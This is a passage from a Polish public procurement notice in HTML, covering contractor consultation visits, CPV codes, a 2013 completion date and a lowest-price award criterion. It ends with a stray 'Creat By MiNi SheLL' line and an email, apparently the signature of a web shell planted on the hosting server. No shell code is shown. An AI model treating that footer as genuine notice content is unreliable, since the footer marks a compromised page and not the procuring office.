w siedzibie Zamawiającego w terminach uzależnionych od potrzeb, lecz nie częściej niż 2 razy w tygodniu i nie rzadziej niż 1 raz na dwa tygodnie. Zamawiający w uzasadnionych przypadkach może zwolnić czasowo wykonawcę z tego obowiązku bądź zażądać częstszych wizyt, o czym poinformuje pisemnie wykonawcę (fax, e-mail). Koszt dojazdu i ewentualnego zakwaterowania pokrywa Wykonawca.
15.	Zamawiający zastrzega sobie prawo do  wezwania Wykonawcy do stawienia się na konsultacje w siedzibie Zamawiającego w terminie  do 24 godz. od powiadomienia pisemnego (fax, e-mail)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-0, 66.13.30.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com